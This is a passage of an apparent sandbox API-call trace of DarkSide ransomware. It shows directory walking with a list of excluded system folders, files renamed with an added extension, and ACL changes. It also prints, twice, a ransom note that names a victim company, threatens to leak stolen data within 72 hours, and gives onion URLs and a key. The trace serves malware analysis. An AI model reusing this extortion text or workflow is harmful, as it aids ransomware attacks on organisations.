HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv") returned 0x58 [0156.596] wcscpy (in: _Dest=0x4570178, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.596] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\urw1hxnf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\urw1hxnf.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\urw1hxnf.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0156.611] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.611] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0156.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c6a5b76 [0156.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x22f4d09 [0156.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x493e7967 [0156.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a8b9826 [0156.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e81eca [0156.616] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d3fbdbe [0156.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3432eb26 [0156.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd440719 [0156.620] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0xdd601ea7 [0156.620] RtlComputeCrc32 (PartialCrc=0x1ea7, Buffer=0x4790094, Length=0x80) returned 0xda98b090 [0156.620] RtlComputeCrc32 (PartialCrc=0xb090, Buffer=0x4790094, Length=0x80) returned 0x7a996b52 [0156.620] RtlComputeCrc32 (PartialCrc=0x6b52, Buffer=0x4790094, Length=0x80) returned 0x4965c7ca [0156.620] RtlComputeCrc32 (PartialCrc=0xc7ca, Buffer=0x4790094, Length=0x80) returned 0x9900c2d [0156.620] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0156.620] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.620] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.620] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.620] FindClose (in: hFindFile=0x2db8800 | out: hFindFile=0x2db8800) returned 1 [0156.620] _wcsicmp (_Str1="backup", _Str2="QLTL2-0X") returned -15 [0156.620] wcslen (_String="backup") returned 0x6 [0156.620] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.620] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.620] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfceb10, ftCreationTime.dwHighDateTime=0x1d5dc1b, ftLastAccessTime.dwLowDateTime=0x9b4dcbe0, ftLastAccessTime.dwHighDateTime=0x1d5e247, ftLastWriteTime.dwLowDateTime=0x9b4dcbe0, ftLastWriteTime.dwHighDateTime=0x1d5e247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rBDds", cAlternateFileName="")) returned 1 [0156.620] _wcsicmp (_Str1="$recycle.bin", _Str2="rBDds") returned -78 [0156.620] wcslen (_String="$recycle.bin") returned 0xc [0156.620] _wcsicmp (_Str1="config.msi", _Str2="rBDds") returned -15 [0156.620] wcslen (_String="config.msi") returned 0xa [0156.620] _wcsicmp (_Str1="$windows.~bt", _Str2="rBDds") returned -78 [0156.620] wcslen (_String="$windows.~bt") returned 0xc [0156.621] _wcsicmp (_Str1="$windows.~ws", _Str2="rBDds") returned -78 [0156.621] wcslen (_String="$windows.~ws") returned 0xc [0156.621] _wcsicmp (_Str1="windows", _Str2="rBDds") returned 5 [0156.621] wcslen (_String="windows") returned 0x7 [0156.621] _wcsicmp (_Str1="appdata", _Str2="rBDds") returned -17 [0156.621] wcslen (_String="appdata") returned 0x7 [0156.621] _wcsicmp (_Str1="application data", _Str2="rBDds") returned -17 [0156.621] wcslen (_String="application data") returned 0x10 [0156.621] _wcsicmp (_Str1="boot", _Str2="rBDds") returned -16 [0156.621] wcslen (_String="boot") returned 0x4 [0156.621] _wcsicmp (_Str1="google", _Str2="rBDds") returned -11 [0156.621] wcslen (_String="google") returned 0x6 [0156.621] _wcsicmp (_Str1="mozilla", _Str2="rBDds") returned -5 [0156.621] wcslen (_String="mozilla") returned 0x7 [0156.621] _wcsicmp (_Str1="program files", _Str2="rBDds") returned -2 [0156.621] wcslen (_String="program files") returned 0xd [0156.621] _wcsicmp (_Str1="program files (x86)", _Str2="rBDds") returned -2 [0156.621] wcslen (_String="program files (x86)") returned 0x13 [0156.621] _wcsicmp (_Str1="programdata", _Str2="rBDds") returned -2 [0156.621] wcslen (_String="programdata") returned 0xb [0156.621] _wcsicmp (_Str1="system volume information", _Str2="rBDds") returned 1 [0156.621] wcslen (_String="system volume information") returned 0x19 [0156.621] _wcsicmp (_Str1="tor browser", _Str2="rBDds") returned 2 [0156.621] wcslen (_String="tor browser") returned 0xb [0156.621] _wcsicmp (_Str1="windows.old", _Str2="rBDds") returned 5 [0156.621] wcslen (_String="windows.old") returned 0xb [0156.621] _wcsicmp (_Str1="intel", _Str2="rBDds") returned -9 [0156.621] wcslen (_String="intel") returned 0x5 [0156.621] _wcsicmp (_Str1="msocache", _Str2="rBDds") returned -5 [0156.621] wcslen (_String="msocache") returned 0x8 [0156.621] _wcsicmp (_Str1="perflogs", _Str2="rBDds") returned -2 [0156.621] wcslen (_String="perflogs") returned 0x8 [0156.621] _wcsicmp (_Str1="x64dbg", _Str2="rBDds") returned 6 [0156.621] wcslen (_String="x64dbg") returned 0x6 [0156.621] _wcsicmp (_Str1="public", _Str2="rBDds") returned -2 [0156.621] wcslen (_String="public") returned 0x6 [0156.621] _wcsicmp (_Str1="all users", _Str2="rBDds") returned -17 [0156.621] wcslen (_String="all users") returned 0x9 [0156.622] _wcsicmp (_Str1="default", _Str2="rBDds") returned -14 [0156.622] wcslen (_String="default") returned 0x7 [0156.622] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" [0156.622] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned 0x44 [0156.622] wcscpy (in: _Dest=0x451011e, _Source="rBDds" | out: _Dest="rBDds") returned="rBDds" [0156.622] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.622] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.622] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" [0156.622] GetNamedSecurityInfoW () returned 0x0 [0156.622] SetEntriesInAclW () returned 0x0 [0156.622] SetNamedSecurityInfoW () returned 0x0 [0156.628] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e24ed0) returned 1 [0156.628] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe33c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.628] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds")) returned 1 [0156.628] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.628] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.629] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe30c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe30c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.629] CloseHandle (hObject=0x678) returned 1 [0156.630] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds")) returned 0x10 [0156.630] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\") returned="" [0156.630] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\") returned 0x49 [0156.630] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe56c) returned 0x2db8800 [0156.630] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfceb10, ftCreationTime.dwHighDateTime=0x1d5dc1b, ftLastAccessTime.dwLowDateTime=0xdbf973e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbf973e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.630] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28050330, ftCreationTime.dwHighDateTime=0x1d5e54c, ftLastAccessTime.dwLowDateTime=0x289960d0, ftLastAccessTime.dwHighDateTime=0x1d5e163, ftLastWriteTime.dwLowDateTime=0x289960d0, ftLastWriteTime.dwHighDateTime=0x1d5e163, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="483DuOeJ6", cAlternateFileName="483DUO~1")) returned 1 [0156.630] _wcsicmp (_Str1="$recycle.bin", _Str2="483DuOeJ6") returned -16 [0156.630] wcslen (_String="$recycle.bin") returned 0xc [0156.630] _wcsicmp (_Str1="config.msi", _Str2="483DuOeJ6") returned 47 [0156.630] wcslen (_String="config.msi") returned 0xa [0156.630] _wcsicmp (_Str1="$windows.~bt", _Str2="483DuOeJ6") returned -16 [0156.630] wcslen (_String="$windows.~bt") returned 0xc [0156.630] _wcsicmp (_Str1="$windows.~ws", _Str2="483DuOeJ6") returned -16 [0156.630] wcslen (_String="$windows.~ws") returned 0xc [0156.630] _wcsicmp (_Str1="windows", _Str2="483DuOeJ6") returned 67 [0156.630] wcslen (_String="windows") returned 0x7 [0156.630] _wcsicmp (_Str1="appdata", _Str2="483DuOeJ6") returned 45 [0156.630] wcslen (_String="appdata") returned 0x7 [0156.630] _wcsicmp (_Str1="application data", _Str2="483DuOeJ6") returned 45 [0156.630] wcslen (_String="application data") returned 0x10 [0156.631] _wcsicmp (_Str1="boot", _Str2="483DuOeJ6") returned 46 [0156.631] wcslen (_String="boot") returned 0x4 [0156.631] _wcsicmp (_Str1="google", _Str2="483DuOeJ6") returned 51 [0156.631] wcslen (_String="google") returned 0x6 [0156.631] _wcsicmp (_Str1="mozilla", _Str2="483DuOeJ6") returned 57 [0156.631] wcslen (_String="mozilla") returned 0x7 [0156.631] _wcsicmp (_Str1="program files", _Str2="483DuOeJ6") returned 60 [0156.631] wcslen (_String="program files") returned 0xd [0156.631] _wcsicmp (_Str1="program files (x86)", _Str2="483DuOeJ6") returned 60 [0156.631] wcslen (_String="program files (x86)") returned 0x13 [0156.631] _wcsicmp (_Str1="programdata", _Str2="483DuOeJ6") returned 60 [0156.631] wcslen (_String="programdata") returned 0xb [0156.631] _wcsicmp (_Str1="system volume information", _Str2="483DuOeJ6") returned 63 [0156.631] wcslen (_String="system volume information") returned 0x19 [0156.631] _wcsicmp (_Str1="tor browser", _Str2="483DuOeJ6") returned 64 [0156.631] wcslen (_String="tor browser") returned 0xb [0156.631] _wcsicmp (_Str1="windows.old", _Str2="483DuOeJ6") returned 67 [0156.631] wcslen (_String="windows.old") returned 0xb [0156.631] _wcsicmp (_Str1="intel", _Str2="483DuOeJ6") returned 53 [0156.631] wcslen (_String="intel") returned 0x5 [0156.631] _wcsicmp (_Str1="msocache", _Str2="483DuOeJ6") returned 57 [0156.631] wcslen (_String="msocache") returned 0x8 [0156.631] _wcsicmp (_Str1="perflogs", _Str2="483DuOeJ6") returned 60 [0156.631] wcslen (_String="perflogs") returned 0x8 [0156.631] _wcsicmp (_Str1="x64dbg", _Str2="483DuOeJ6") returned 68 [0156.631] wcslen (_String="x64dbg") returned 0x6 [0156.631] _wcsicmp (_Str1="public", _Str2="483DuOeJ6") returned 60 [0156.631] wcslen (_String="public") returned 0x6 [0156.631] _wcsicmp (_Str1="all users", _Str2="483DuOeJ6") returned 45 [0156.631] wcslen (_String="all users") returned 0x9 [0156.631] _wcsicmp (_Str1="default", _Str2="483DuOeJ6") returned 48 [0156.631] wcslen (_String="default") returned 0x7 [0156.631] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\*" [0156.631] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\*") returned 0x4a [0156.631] wcscpy (in: _Dest=0x4540142, _Source="483DuOeJ6" | out: _Dest="483DuOeJ6") returned="483DuOeJ6" [0156.631] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.631] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.633] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" [0156.633] GetNamedSecurityInfoW () returned 0x0 [0156.633] SetEntriesInAclW () returned 0x0 [0156.633] SetNamedSecurityInfoW () returned 0x0 [0156.636] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e24f70) returned 1 [0156.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe0bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.636] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 1 [0156.637] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.637] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.637] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe08c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe08c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.638] CloseHandle (hObject=0x678) returned 1 [0156.638] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 0x10 [0156.638] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\") returned="" [0156.638] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\") returned 0x53 [0156.638] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe2ec) returned 0x2db8840 [0156.639] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28050330, ftCreationTime.dwHighDateTime=0x1d5e54c, ftLastAccessTime.dwLowDateTime=0xdbf973e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbf973e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.639] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe61bc400, ftCreationTime.dwHighDateTime=0x1d5e563, ftLastAccessTime.dwLowDateTime=0x8cec9a40, ftLastAccessTime.dwHighDateTime=0x1d5e4fe, ftLastWriteTime.dwLowDateTime=0x8cec9a40, ftLastWriteTime.dwHighDateTime=0x1d5e4fe, nFileSizeHigh=0x0, nFileSizeLow=0x817e, dwReserved0=0x0, dwReserved1=0x0, cFileName="3vvtB.swf", cAlternateFileName="")) returned 1 [0156.639] _wcsicmp (_Str1="3vvtB.swf", _Str2="README.c06622a1.TXT") returned -63 [0156.640] wcsstr (_Str="3vvtB.swf", _SubStr="README") returned 0x0 [0156.640] _wcsicmp (_Str1="autorun.inf", _Str2="3vvtB.swf") returned 46 [0156.640] wcslen (_String="autorun.inf") returned 0xb [0156.640] _wcsicmp (_Str1="boot.ini", _Str2="3vvtB.swf") returned 47 [0156.640] wcslen (_String="boot.ini") returned 0x8 [0156.640] _wcsicmp (_Str1="bootfont.bin", _Str2="3vvtB.swf") returned 47 [0156.640] wcslen (_String="bootfont.bin") returned 0xc [0156.640] _wcsicmp (_Str1="bootsect.bak", _Str2="3vvtB.swf") returned 47 [0156.640] wcslen (_String="bootsect.bak") returned 0xc [0156.640] _wcsicmp (_Str1="desktop.ini", 